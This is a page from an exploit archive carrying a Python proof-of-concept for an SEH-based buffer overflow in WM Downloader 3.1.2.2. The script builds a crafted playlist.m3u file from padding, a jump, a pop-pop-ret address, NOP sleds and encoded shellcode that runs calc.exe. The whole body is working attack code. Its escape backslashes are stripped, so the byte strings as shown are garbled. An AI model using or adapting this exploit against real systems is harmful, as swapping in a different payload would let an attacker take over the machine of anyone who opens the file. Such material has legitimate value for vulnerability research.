WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
# Published : 2010-07-28
# Author : fdisk
# Previous Title : Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability
# Next Title : HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)

#!/usr/bin/python
# Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
# Date: 2010-07-28
# Author: fdisk
# Version: 3.1.2.2 2010.04.15
# Tested on Windows XP SP3 en

payload = "x41" * 43485 
payload += "xebx16x90x90" # jump
payload += "xb4x15xbbx01" # ppr - WDCodec00.dll
payload += "x90" * 16 
# windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=thread, CMD=calc.exe
payload += ("xdbxdfxd9x74x24xf4x58x2bxc9xb1x33xbax4cxa8x75"
"x76x83xc0x04x31x50x13x03x1cxbbx97x83x60x53xde"
"x6cx98xa4x81xe5x7dx95x93x92xf6x84x23xd0x5ax25"
"xcfxb4x4exbexbdx10x61x77x0bx47x4cx88xbdx47x02"
"x4axdfx3bx58x9fx3fx05x93xd2x3ex42xc9x1dx12x1b"
"x86x8cx83x28xdax0cxa5xfex51x2cxddx7bxa5xd9x57"
"x85xf5x72xe3xcdxedxf9xabxedx0cx2dxa8xd2x47x5a"
"x1bxa0x56x8ax55x49x69xf2x3ax74x46xffx43xb0x60"
"xe0x31xcax93x9dx41x09xeex79xc7x8cx48x09x7fx75"
"x69xdexe6xfex65xabx6dx58x69x2axa1xd2x95xa7x44"
"x35x1cxf3x62x91x45xa7x0bx80x23x06x33xd2x8bxf7"
"x91x98x39xe3xa0xc2x57xf2x21x79x1exf4x39x82x30"
"x9dx08x09xdfxdax94xd8xa4x05x77xc9xd0xadx2ex98"
"x59xb0xd0x76x9dxcdx52x73x5dx2ax4axf6x58x76xcc"
"xeax10xe7xb9x0cx87x08xe8x6ex46x9bx70x5fxedx1b"
"x12x9f")
payload += "x90" * 16

file = open("playlist.m3u", "w")
file.write(payload)
file.close()

print "m3u file generated successfuly"